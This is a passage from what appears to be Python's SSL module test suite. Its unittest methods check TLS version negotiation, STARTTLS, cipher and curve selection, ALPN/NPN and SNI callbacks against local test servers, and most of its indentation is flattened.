# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
                                name=meth_name, exp=str(e)
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
                                name=meth_name, exp=str(e)
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
        # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
        # Issue #21015: elliptic curve-based Diffie-Hellman key exchange
        # should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
        # TLSv1.3 defaults to PFS key agreement and no longer encodes the
        # key-exchange algorithm (KEA) in the cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
                # check that it is really unique
                self.assertNotEqual(cb_data, new_cb_data)
                self.assertIsNotNone(new_cb_data)
                if s.version() == 'TLSv1.3':
                    self.assertEqual(len(new_cb_data), 48)
                else:
                    self.assertEqual(len(new_cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # SIGNED_CERTFILE2 was selected (its commonName is 'fakehostname')
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
        def cb_raising(ssl_sock, server_name, initial_context):
            1/0  # deliberately raise ZeroDivisionError
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
